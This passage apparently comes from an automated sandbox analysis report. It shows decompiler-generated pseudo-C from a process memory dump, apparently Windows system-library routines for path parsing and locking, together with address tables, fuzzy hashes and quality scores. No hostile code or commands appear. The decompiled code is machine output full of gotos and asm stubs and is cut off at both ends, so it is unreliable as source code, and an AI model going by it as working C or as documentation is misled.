                        												_t161 = 3;
                        											} else {
                        												_t242 = _t254[2] & 0x0000ffff;
                        												if(_t242 != 0x5c) {
                        													if(_t242 == 0x2f) {
                        														goto L16;
                        													} else {
                        														goto L87;
                        													}
                        													goto L101;
                        												} else {
                        													L16:
                        													_t161 = 2;
                        												}
                        											}
                        										}
                        									} else {
                        										_t243 =  *_t254 & 0x0000ffff;
                        										if(_t243 == 0x5c || _t243 == 0x2f) {
                        											if(_t316 < 4) {
                        												L81:
                        												_t161 = 4;
                        												goto L17;
                        											} else {
                        												_t244 = _t254[1] & 0x0000ffff;
                        												if(_t244 != 0x5c) {
                        													if(_t244 == 0x2f) {
                        														goto L60;
                        													} else {
                        														goto L81;
                        													}
                        												} else {
                        													L60:
                        													if(_t316 < 6) {
                        														L83:
                        														_t161 = 1;
                        														goto L17;
                        													} else {
                        														_t245 = _t254[2] & 0x0000ffff;
                        														if(_t245 != 0x2e) {
                        															if(_t245 == 0x3f) {
                        																goto L62;
                        															} else {
                        																goto L83;
                        															}
                        														} else {
                        															L62:
                        															if(_t316 < 8) {
                        																L85:
                        																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                        																goto L17;
                        															} else {
                        																_t250 = _t254[3] & 0x0000ffff;
                        																if(_t250 != 0x5c) {
                        																	if(_t250 == 0x2f) {
                        																		goto L64;
                        																	} else {
                        																		goto L85;
                        																	}
                        																} else {
                        																	L64:
                        																	_t161 = 6;
                        																	goto L17;
                        																}
                        															}
                        														}
                        													}
                        												}
                        											}
                        											goto L101;
                        										} else {
                        											goto L11;
                        										}
                        									}
                        									L17:
                        									if(_t161 != 2) {
                        										_t162 = _t161 - 1;
                        										if(_t162 > 5) {
                        											goto L18;
                        										} else {
                        											switch( *((intOrPtr*)(_t162 * 4 +  &M02BB45F8))) {
                        												case 0:
                        													_v568 = 0x2b71078;
                        													__eax = 2;
                        													goto L20;
                        												case 1:
                        													goto L18;
                        												case 2:
                        													_t163 = 4;
                        													goto L19;
                        											}
                        										}
                        										goto L41;
                        									} else {
                        										L18:
                        										_t163 = 0;
                        										L19:
                        										_v568 = 0x2b711c4;
                        									}
                        									L20:
                        									_v588 = _t163;
                        									_v564 = _t163 + _t163;
                        									_t306 =  *_v568 & 0x0000ffff;
                        									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                        									_v576 = _t265;
                        									if(_t265 > 0xfffe) {
                        										L90:
                        										_t322 = 0xc0000106;
                        									} else {
                        										if(_t321 != 0) {
                        											if(_t265 > (_t321[1] & 0x0000ffff)) {
                        												if(_v580 != 0) {
                        													goto L23;
                        												} else {
                        													_t322 = 0xc0000106;
                        													goto L39;
                        												}
                        											} else {
                        												_t177 = _t306;
                        												goto L25;
                        											}
                        											goto L101;
                        										} else {
                        											if(_v580 == _t321) {
                        												_t322 = 0xc000000d;
                        											} else {
                        												L23:
                        												_t173 = L02BB4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                        												_t269 = _v592;
                        												_t269[2] = _t173;
                        												if(_t173 == 0) {
                        													_t322 = 0xc0000017;
                        												} else {
                        													_t316 = _v556;
                        													 *_t269 = 0;
                        													_t321 = _t269;
                        													_t269[1] = _v576;
                        													_t177 =  *_v568 & 0x0000ffff;
                        													L25:
                        													_v580 = _t177;
                        													if(_t177 == 0) {
                        														L29:
                        														_t307 =  *_t321 & 0x0000ffff;
                        													} else {
                        														_t290 =  *_t321 & 0x0000ffff;
                        														_v576 = _t290;
                        														_t310 = _t177 & 0x0000ffff;
                        														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                        															_t307 =  *_t321 & 0xffff;
                        														} else {
                        															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                        															E02BDF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                        															_t329 = _t329 + 0xc;
                        															_t311 = _v580;
                        															_t225 =  *_t321 + _t311 & 0x0000ffff;
                        															 *_t321 = _t225;
                        															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                        																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                        															}
                        															goto L29;
                        														}
                        													}
                        													_t271 = _v556 - _v588 + _v588;
                        													_v580 = _t307;
                        													_v576 = _t271;
                        													if(_t271 != 0) {
                        														_t308 = _t271 & 0x0000ffff;
                        														_v588 = _t308;
                        														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                        															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                        															E02BDF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                        															_t329 = _t329 + 0xc;
                        															_t213 =  *_t321 + _v576 & 0x0000ffff;
                        															 *_t321 = _t213;
                        															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                        																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                        															}
                        														}
                        													}
                        													_t272 = _v560;
                        													if(_t272 != 0) {
                        														 *_t272 = _t321;
                        													}
                        													_t306 = 0;
                        													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                        													_t275 = _v572;
                        													if(_t275 != 0) {
                        														_t306 =  *_t275;
                        														if(_t306 != 0) {
                        															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                        														}
                        													}
                        													_t181 = _v544;
                        													if(_t181 != 0) {
                        														 *_t181 = 0;
                        														 *((intOrPtr*)(_t181 + 4)) = 0;
                        														 *((intOrPtr*)(_t181 + 8)) = 0;
                        														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                        														if(_v540 == 5) {
                        															_t182 = E02B952A5(1);
                        															_v588 = _t182;
                        															if(_t182 == 0) {
                        																E02BAEB70(1, 0x2c879a0);
                        																goto L38;
                        															} else {
                        																_v560 = _t182 + 0xc;
                        																_t185 = E02BAAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                        																if(_t185 == 0) {
                        																	_t324 = _v588;
                        																	goto L97;
                        																} else {
                        																	_t306 = _v544;
                        																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                        																	 *(_t306 + 4) = _t282;
                        																	_v576 = _t282;
                        																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                        																	 *_t306 = _t325;
                        																	if( *_t282 == 0x5c) {
                        																		_t149 = _t325 - 2; // -2
                        																		_t283 = _t149;
                        																		 *_t306 = _t283;
                        																		 *(_t306 + 4) = _v576 + 2;
                        																		_t185 = _t283 & 0x0000ffff;
                        																	}
                        																	_t324 = _v588;
                        																	 *(_t306 + 2) = _t185;
                        																	if((_v548 & 0x00000002) == 0) {
                        																		L97:
                        																		asm("lock xadd [esi], eax");
                        																		if((_t185 | 0xffffffff) == 0) {
                        																			_push( *((intOrPtr*)(_t324 + 4)));
                        																			E02BD95D0();
                        																			L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                        																		}
                        																	} else {
                        																		 *(_t306 + 0xc) = _t324;
                        																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                        																	}
                        																	goto L38;
                        																}
                        															}
                        															goto L41;
                        														}
                        													}
                        													L38:
                        													_t322 = 0;
                        												}
                        											}
                        										}
                        									}
                        									L39:
                        									if(_t254 !=  &_v532) {
                        										L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                        									}
                        									_t169 = _t322;
                        								}
                        								goto L41;
                        							}
                        							goto L68;
                        						}
                        					}
                        					L41:
                        					_pop(_t317);
                        					_pop(_t323);
                        					_pop(_t255);
                        					return E02BDB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                        				} else {
                        					_t299 = __edx[2];
                        					if( *_t299 == 0x5c) {
                        						_t256 =  *(_t299 + 2) & 0x0000ffff;
                        						if(_t256 != 0x5c) {
                        							if(_t256 != 0x3f) {
                        								goto L2;
                        							} else {
                        								goto L50;
                        							}
                        						} else {
                        							L50:
                        							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                        								goto L2;
                        							} else {
                        								_t251 = E02BD3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                        								_pop(_t319);
                        								_pop(_t326);
                        								_pop(_t257);
                        								return E02BDB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                        							}
                        						}
                        					} else {
                        						L2:
                        						_t260 = _v572;
                        						goto L3;
                        					}
                        				}
                        				L101:
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4df8cf94bb2acd3fb1532255901262955a49d1636eafb7387d2c1fc98e43ba97
                        • Instruction ID: b6ac48e701d3de77a6665e7ab6f2d0f087ebb1346e9bb62874ce0854198c99cd
                        • Opcode Fuzzy Hash: 4df8cf94bb2acd3fb1532255901262955a49d1636eafb7387d2c1fc98e43ba97
                        • Instruction Fuzzy Hash: EDF17E706082118FC765CF19C490ABAB7F1FF88708F1489AEF586CB261E774D995CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E02BC20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                        				signed int _v16;
                        				signed int _v20;
                        				signed char _v24;
                        				intOrPtr _v28;
                        				signed int _v32;
                        				void* _v36;
                        				char _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				unsigned int _v60;
                        				char _v64;
                        				unsigned int _v68;
                        				signed int _v72;
                        				char _v73;
                        				signed int _v74;
                        				char _v75;
                        				signed int _v76;
                        				void* _v81;
                        				void* _v82;
                        				void* _v89;
                        				void* _v92;
                        				void* _v97;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed char _t128;
                        				void* _t129;
                        				signed int _t130;
                        				void* _t132;
                        				signed char _t133;
                        				intOrPtr _t135;
                        				signed int _t137;
                        				signed int _t140;
                        				signed int* _t144;
                        				signed int* _t145;
                        				intOrPtr _t146;
                        				signed int _t147;
                        				signed char* _t148;
                        				signed int _t149;
                        				signed int _t153;
                        				signed int _t169;
                        				signed int _t174;
                        				signed int _t180;
                        				void* _t197;
                        				void* _t198;
                        				signed int _t201;
                        				intOrPtr* _t202;
                        				intOrPtr* _t205;
                        				signed int _t210;
                        				signed int _t215;
                        				signed int _t218;
                        				signed char _t221;
                        				signed int _t226;
                        				char _t227;
                        				signed int _t228;
                        				void* _t229;
                        				unsigned int _t231;
                        				void* _t235;
                        				signed int _t240;
                        				signed int _t241;
                        				void* _t242;
                        				signed int _t246;
                        				signed int _t248;
                        				signed int _t252;
                        				signed int _t253;
                        				void* _t254;
                        				intOrPtr* _t256;
                        				intOrPtr _t257;
                        				unsigned int _t262;
                        				signed int _t265;
                        				void* _t267;
                        				signed int _t275;
                        
                        				_t198 = __ebx;
                        				_t267 = (_t265 & 0xfffffff0) - 0x48;
                        				_v68 = __ecx;
                        				_v73 = 0;
                        				_t201 = __edx & 0x00002000;
                        				_t128 = __edx & 0xffffdfff;
                        				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                        				_v72 = _t128;
                        				if((_t128 & 0x00000008) != 0) {
                        					__eflags = _t128 - 8;
                        					if(_t128 != 8) {
                        						L69:
                        						_t129 = 0xc000000d;
                        						goto L23;
                        					} else {
                        						_t130 = 0;
                        						_v72 = 0;
                        						_v75 = 1;
                        						L2:
                        						_v74 = 1;
                        						_t226 =  *0x2c88714; // 0x0
                        						if(_t226 != 0) {
                        							__eflags = _t201;
                        							if(_t201 != 0) {
                        								L62:
                        								_v74 = 1;
                        								L63:
                        								_t130 = _t226 & 0xffffdfff;
                        								_v72 = _t130;
                        								goto L3;
                        							}
                        							_v74 = _t201;
                        							__eflags = _t226 & 0x00002000;
                        							if((_t226 & 0x00002000) == 0) {
                        								goto L63;
                        							}
                        							goto L62;
                        						}
                        						L3:
                        						_t227 = _v75;
                        						L4:
                        						_t240 = 0;
                        						_v56 = 0;
                        						_t252 = _t130 & 0x00000100;
                        						if(_t252 != 0 || _t227 != 0) {
                        							_t240 = _v68;
                        							_t132 = E02BC2EB0(_t240);
                        							__eflags = _t132 - 2;
                        							if(_t132 != 2) {
                        								__eflags = _t132 - 1;
                        								if(_t132 == 1) {
                        									goto L25;
                        								}
                        								__eflags = _t132 - 6;
                        								if(_t132 == 6) {
                        									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                        									if( *((short*)(_t240 + 4)) != 0x3f) {
                        										goto L40;
                        									}
                        									_t197 = E02BC2EB0(_t240 + 8);
                        									__eflags = _t197 - 2;
                        									if(_t197 == 2) {
                        										goto L25;
                        									}
                        								}
                        								L40:
                        								_t133 = 1;
                        								L26:
                        								_t228 = _v75;
                        								_v56 = _t240;
                        								__eflags = _t133;
                        								if(_t133 != 0) {
                        									__eflags = _t228;
                        									if(_t228 == 0) {
                        										L43:
                        										__eflags = _v72;
                        										if(_v72 == 0) {
                        											goto L8;
                        										}
                        										goto L69;
                        									}
                        									_t133 = E02B958EC(_t240);
                        									_t221 =  *0x2c85cac; // 0x16
                        									__eflags = _t221 & 0x00000040;
                        									if((_t221 & 0x00000040) != 0) {
                        										_t228 = 0;
                        										__eflags = _t252;
                        										if(_t252 != 0) {
                        											goto L43;
                        										}
                        										_t133 = _v72;
                        										goto L7;
                        									}
                        									goto L43;
                        								} else {
                        									_t133 = _v72;
                        									goto L6;
                        								}
                        							}
                        							L25:
                        							_t133 = _v73;
                        							goto L26;
                        						} else {
                        							L6:
                        							_t221 =  *0x2c85cac; // 0x16
                        							L7:
                        							if(_t133 != 0) {
                        								__eflags = _t133 & 0x00001000;
                        								if((_t133 & 0x00001000) != 0) {
                        									_t133 = _t133 | 0x00000a00;
                        									__eflags = _t221 & 0x00000004;
                        									if((_t221 & 0x00000004) != 0) {
                        										_t133 = _t133 | 0x00000400;
                        									}
                        								}
                        								__eflags = _t228;
                        								if(_t228 != 0) {
                        									_t133 = _t133 | 0x00000100;
                        								}
                        								_t229 = E02BD4A2C(0x2c86e40, 0x2bd4b30, _t133, _t240);
                        								__eflags = _t229;
                        								if(_t229 == 0) {
                        									_t202 = _a20;
                        									goto L100;
                        								} else {
                        									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                        									L15:
                        									_t202 = _a20;
                        									 *_t202 = _t135;
                        									if(_t229 == 0) {
                        										L100:
                        										 *_a4 = 0;
                        										_t137 = _a8;
                        										__eflags = _t137;
                        										if(_t137 != 0) {
                        											 *_t137 = 0;
                        										}
                        										 *_t202 = 0;
                        										_t129 = 0xc0000017;
                        										goto L23;
                        									} else {
                        										_t242 = _a16;
                        										if(_t242 != 0) {
                        											_t254 = _t229;
                        											memcpy(_t242, _t254, 0xd << 2);
                        											_t267 = _t267 + 0xc;
                        											_t242 = _t254 + 0x1a;
                        										}
                        										_t205 = _a4;
                        										_t25 = _t229 + 0x48; // 0x48
                        										 *_t205 = _t25;
                        										_t140 = _a8;
                        										if(_t140 != 0) {
                        											__eflags =  *((char*)(_t267 + 0xa));
                        											if( *((char*)(_t267 + 0xa)) != 0) {
                        												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                        											} else {
                        												 *_t140 = 0;
                        											}
                        										}
                        										_t256 = _a12;
                        										if(_t256 != 0) {
                        											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                        										}
                        										_t257 =  *_t205;
                        										_v48 = 0;
                        										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                        										_v56 = 0;
                        										_v52 = 0;
                        										_t144 =  *( *[fs:0x30] + 0x50);
                        										if(_t144 != 0) {
                        											__eflags =  *_t144;
                        											if( *_t144 == 0) {
                        												goto L20;
                        											}
                        											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                        											goto L21;
                        										} else {
                        											L20:
                        											_t145 = 0x7ffe0384;
                        											L21:
                        											if( *_t145 != 0) {
                        												_t146 =  *[fs:0x30];
                        												__eflags =  *(_t146 + 0x240) & 0x00000004;
                        												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                        													_t147 = E02BB7D50();
                        													__eflags = _t147;
                        													if(_t147 == 0) {
                        														_t148 = 0x7ffe0385;
                        													} else {
                        														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                        													}
                        													__eflags =  *_t148 & 0x00000020;
                        													if(( *_t148 & 0x00000020) != 0) {
                        														_t149 = _v72;
                        														__eflags = _t149;
                        														if(__eflags == 0) {
                        															_t149 = 0x2b75c80;
                        														}
                        														_push(_t149);
                        														_push( &_v48);
                        														 *((char*)(_t267 + 0xb)) = E02BCF6E0(_t198, _t242, _t257, __eflags);
                        														_push(_t257);
                        														_push( &_v64);
                        														_t153 = E02BCF6E0(_t198, _t242, _t257, __eflags);
                        														__eflags =  *((char*)(_t267 + 0xb));
                        														if( *((char*)(_t267 + 0xb)) != 0) {
                        															__eflags = _t153;
                        															if(_t153 != 0) {
                        																__eflags = 0;
                        																E02C17016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                        																L02BB2400(_t267 + 0x20);
                        															}
                        															L02BB2400( &_v64);
                        														}
                        													}
                        												}
                        											}
                        											_t129 = 0;
                        											L23:
                        											return _t129;
                        										}
                        									}
                        								}
                        							}
                        							L8:
                        							_t275 = _t240;
                        							if(_t275 != 0) {
                        								_v73 = 0;
                        								_t253 = 0;
                        								__eflags = 0;
                        								L29:
                        								_push(0);
                        								_t241 = E02BC2397(_t240);
                        								__eflags = _t241;
                        								if(_t241 == 0) {
                        									_t229 = 0;
                        									L14:
                        									_t135 = 0;
                        									goto L15;
                        								}
                        								__eflags =  *((char*)(_t267 + 0xb));
                        								 *(_t241 + 0x34) = 1;
                        								if( *((char*)(_t267 + 0xb)) != 0) {
                        									E02BB2280(_t134, 0x2c88608);
                        									__eflags =  *0x2c86e48 - _t253; // 0x2734d28
                        									if(__eflags != 0) {
                        										L48:
                        										_t253 = 0;
                        										__eflags = 0;
                        										L49:
                        										E02BAFFB0(_t198, _t241, 0x2c88608);
                        										__eflags = _t253;
                        										if(_t253 != 0) {
                        											L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                        										}
                        										goto L31;
                        									}
                        									 *0x2c86e48 = _t241;
                        									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                        									__eflags = _t253;
                        									if(_t253 != 0) {
                        										_t57 = _t253 + 0x34;
                        										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                        										__eflags =  *_t57;
                        										if( *_t57 == 0) {
                        											goto L49;
                        										}
                        									}
                        									goto L48;
                        								}
                        								L31:
                        								_t229 = _t241;
                        								goto L14;
                        							}
                        							_v73 = 1;
                        							_v64 = _t240;
                        							asm("lock bts dword [esi], 0x0");
                        							if(_t275 < 0) {
                        								_t231 =  *0x2c88608; // 0x0
                        								while(1) {
                        									_v60 = _t231;
                        									__eflags = _t231 & 0x00000001;
                        									if((_t231 & 0x00000001) != 0) {
                        										goto L76;
                        									}
                        									_t73 = _t231 + 1; // 0x1
                        									_t210 = _t73;
                        									asm("lock cmpxchg [edi], ecx");
                        									__eflags = _t231 - _t231;
                        									if(_t231 != _t231) {
                        										L92:
                        										_t133 = E02BC6B90(_t210,  &_v64);
                        										_t262 =  *0x2c88608; // 0x0
                        										L93:
                        										_t231 = _t262;
                        										continue;
                        									}
                        									_t240 = _v56;
                        									goto L10;
                        									L76:
                        									_t169 = E02BCE180(_t133);
                        									__eflags = _t169;
                        									if(_t169 != 0) {
                        										_push(0xc000004b);
                        										_push(0xffffffff);
                        										E02BD97C0();
                        										_t231 = _v68;
                        									}
                        									_v72 = 0;
                        									_v24 =  *( *[fs:0x18] + 0x24);
                        									_v16 = 3;
                        									_v28 = 0;
                        									__eflags = _t231 & 0x00000002;
                        									if((_t231 & 0x00000002) == 0) {
                        										_v32 =  &_v36;
                        										_t174 = _t231 >> 4;
                        										__eflags = 1 - _t174;
                        										_v20 = _t174;
                        										asm("sbb ecx, ecx");
                        										_t210 = 3 |  &_v36;
                        										__eflags = _t174;
                        										if(_t174 == 0) {
                        											_v20 = 0xfffffffe;
                        										}
                        									} else {
                        										_v32 = 0;
                        										_v20 = 0xffffffff;
                        										_v36 = _t231 & 0xfffffff0;
                        										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                        										_v72 =  !(_t231 >> 2) & 0xffffff01;
                        									}
                        									asm("lock cmpxchg [edi], esi");
                        									_t262 = _t231;
                        									__eflags = _t262 - _t231;
                        									if(_t262 != _t231) {
                        										goto L92;
                        									} else {
                        										__eflags = _v72;
                        										if(_v72 != 0) {
                        											E02BD006A(0x2c88608, _t210);
                        										}
                        										__eflags =  *0x7ffe036a - 1;
                        										if(__eflags <= 0) {
                        											L89:
                        											_t133 =  &_v16;
                        											asm("lock btr dword [eax], 0x1");
                        											if(__eflags >= 0) {
                        												goto L93;
                        											} else {
                        												goto L90;
                        											}
                        											do {
                        												L90:
                        												_push(0);
                        												_push(0x2c88608);
                        												E02BDB180();
                        												_t133 = _v24;
                        												__eflags = _t133 & 0x00000004;
                        											} while ((_t133 & 0x00000004) == 0);
                        											goto L93;
                        										} else {
                        											_t218 =  *0x2c86904; // 0x400
                        											__eflags = _t218;
                        											if(__eflags == 0) {
                        												goto L89;
                        											} else {
                        												goto L87;
                        											}
                        											while(1) {
                        												L87:
                        												__eflags = _v16 & 0x00000002;
                        												if(__eflags == 0) {
                        													goto L89;
                        												}
                        												asm("pause");
                        												_t218 = _t218 - 1;
                        												__eflags = _t218;
                        												if(__eflags != 0) {
                        													continue;
                        												}
                        												goto L89;
                        											}
                        											goto L89;
                        										}
                        									}
                        								}
                        							}
                        							L10:
                        							_t229 =  *0x2c86e48; // 0x2734d28
                        							_v72 = _t229;
                        							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                        								E02BAFFB0(_t198, _t240, 0x2c88608);
                        								_t253 = _v76;
                        								goto L29;
                        							} else {
                        								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                        								asm("lock cmpxchg [esi], ecx");
                        								_t215 = 1;
                        								if(1 != 1) {
                        									while(1) {
                        										_t246 = _t215 & 0x00000006;
                        										_t180 = _t215;
                        										__eflags = _t246 - 2;
                        										_v56 = _t246;
                        										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                        										asm("lock cmpxchg [edi], esi");
                        										_t248 = _v56;
                        										__eflags = _t180 - _t215;
                        										if(_t180 == _t215) {
                        											break;
                        										}
                        										_t215 = _t180;
                        									}
                        									__eflags = _t248 - 2;
                        									if(_t248 == 2) {
                        										__eflags = 0;
                        										E02BD00C2(0x2c88608, 0, _t235);
                        									}
                        									_t229 = _v72;
                        								}
                        								goto L14;
                        							}
                        						}
                        					}
                        				}
                        				_t227 = 0;
                        				_v75 = 0;
                        				if(_t128 != 0) {
                        					goto L4;
                        				}
                        				goto L2;
                        			}
                        0x02bc21fe
                        0x02bc21e3
                        0x02bc2195
                        0x02bc236c
                        0x02bc2122
                        0x02bc2122
                        0x02bc2124
                        0x02bc2231
                        0x02bc2236
                        0x02bc2236
                        0x02bc2238
                        0x02bc2238
                        0x02bc2240
                        0x02bc2242
                        0x02bc2244
                        0x02c059fc
                        0x02bc218c
                        0x02bc218c
                        0x00000000
                        0x02bc218c
                        0x02bc224a
                        0x02bc224f
                        0x02bc2256
                        0x02bc2304
                        0x02bc2309
                        0x02bc230f
                        0x02bc231e
                        0x02bc231e
                        0x02bc231e
                        0x02bc2320
                        0x02bc2325
                        0x02bc232a
                        0x02bc232c
                        0x02bc233e
                        0x02bc233e
                        0x00000000
                        0x02bc232c
                        0x02bc2311
                        0x02bc2317
                        0x02bc231a
                        0x02bc231c
                        0x02bc2380
                        0x02bc2380
                        0x02bc2380
                        0x02bc2384
                        0x00000000
                        0x00000000
                        0x02bc2386
                        0x00000000
                        0x02bc231c
                        0x02bc225c
                        0x02bc225c
                        0x00000000
                        0x02bc225c
                        0x02bc212a
                        0x02bc2134
                        0x02bc2138
                        0x02bc213d
                        0x02c05858
                        0x02c05863
                        0x02c05863
                        0x02c05867
                        0x02c0586a
                        0x00000000
                        0x00000000
                        0x02c0586c
                        0x02c0586c
                        0x02c05871
                        0x02c05875
                        0x02c05877
                        0x02c05997
                        0x02c0599c
                        0x02c059a1
                        0x02c059a7
                        0x02c059a7
                        0x00000000
                        0x02c059a7
                        0x02c0587d
                        0x00000000
                        0x02c0588b
                        0x02c0588b
                        0x02c05890
                        0x02c05892
                        0x02c05894
                        0x02c05899
                        0x02c0589b
                        0x02c058a0
                        0x02c058a0
                        0x02c058aa
                        0x02c058b2
                        0x02c058b6
                        0x02c058be
                        0x02c058c6
                        0x02c058c9
                        0x02c0590d
                        0x02c05917
                        0x02c0591a
                        0x02c0591c
                        0x02c05920
                        0x02c05928
                        0x02c0592a
                        0x02c0592c
                        0x02c0592e
                        0x02c0592e
                        0x02c058cb
                        0x02c058cd
                        0x02c058d8
                        0x02c058e0
                        0x02c058f4
                        0x02c058fe
                        0x02c058fe
                        0x02c0593a
                        0x02c0593e
                        0x02c05940
                        0x02c05942
                        0x00000000
                        0x02c05944
                        0x02c05944
                        0x02c05949
                        0x02c0594e
                        0x02c0594e
                        0x02c05953
                        0x02c0595b
                        0x02c05976
                        0x02c05976
                        0x02c0597a
                        0x02c0597f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c05981
                        0x02c05981
                        0x02c05981
                        0x02c05983
                        0x02c05988
                        0x02c0598d
                        0x02c05991
                        0x02c05991
                        0x00000000
                        0x02c0595d
                        0x02c0595d
                        0x02c05963
                        0x02c05965
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c05967
                        0x02c05967
                        0x02c0596b
                        0x02c0596d
                        0x00000000
                        0x00000000
                        0x02c0596f
                        0x02c05971
                        0x02c05971
                        0x02c05974
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c05974
                        0x00000000
                        0x02c05967
                        0x02c0595b
                        0x02c05942
                        0x02c05863
                        0x02bc2143
                        0x02bc2143
                        0x02bc2149
                        0x02bc214f
                        0x02bc22f1
                        0x02bc22f6
                        0x00000000
                        0x02bc2173
                        0x02bc2173
                        0x02bc217d
                        0x02bc2181
                        0x02bc2186
                        0x02c059ae
                        0x02c059b2
                        0x02c059b5
                        0x02c059b7
                        0x02c059ba
                        0x02c059cd
                        0x02c059d1
                        0x02c059d5
                        0x02c059d9
                        0x02c059db
                        0x00000000
                        0x00000000
                        0x02c059dd
                        0x02c059dd
                        0x02c059e1
                        0x02c059e4
                        0x02c059e7
                        0x02c059ee
                        0x02c059ee
                        0x02c059f3
                        0x02c059f3
                        0x00000000
                        0x02bc2186
                        0x02bc214f
                        0x02bc2106
                        0x02bc2266
                        0x02bc20d8
                        0x02bc20da
                        0x02bc20e0
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 44f93c06d845a0cd575cdfac08ac186da6a85e72f9a41e52a181e64d0354b392
                        • Instruction ID: af355fdb8ef442fab6057ec650123873a27ff8d2bdc7e00395035b2f18a81023
                        • Opcode Fuzzy Hash: 44f93c06d845a0cd575cdfac08ac186da6a85e72f9a41e52a181e64d0354b392
                        • Instruction Fuzzy Hash: 5AF1D171A083419FDB25CB28C88076A77E6BFC5364F648AADEC959B380D735D841CF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E02BAD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                        				signed int _v8;
                        				intOrPtr _v20;
                        				signed int _v36;
                        				intOrPtr* _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				signed char _v52;
                        				signed int _v60;
                        				signed int _v64;
                        				signed int _v68;
                        				signed int _v72;
                        				signed int _v76;
                        				intOrPtr _v80;
                        				signed int _v84;
                        				intOrPtr _v100;
                        				intOrPtr _v104;
                        				signed int _v108;
                        				signed int _v112;
                        				signed int _v116;
                        				intOrPtr _v120;
                        				signed int _v132;
                        				char _v140;
                        				char _v144;
                        				char _v157;
                        				signed int _v164;
                        				signed int _v168;
                        				signed int _v169;
                        				intOrPtr _v176;
                        				signed int _v180;
                        				signed int _v184;
                        				intOrPtr _v188;
                        				signed int _v192;
                        				signed int _v200;
                        				signed int _v208;
                        				intOrPtr* _v212;
                        				char _v216;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t204;
                        				signed int _t206;
                        				void* _t208;
                        				signed int _t211;
                        				signed int _t216;
                        				intOrPtr _t217;
                        				intOrPtr* _t218;
                        				signed int _t226;
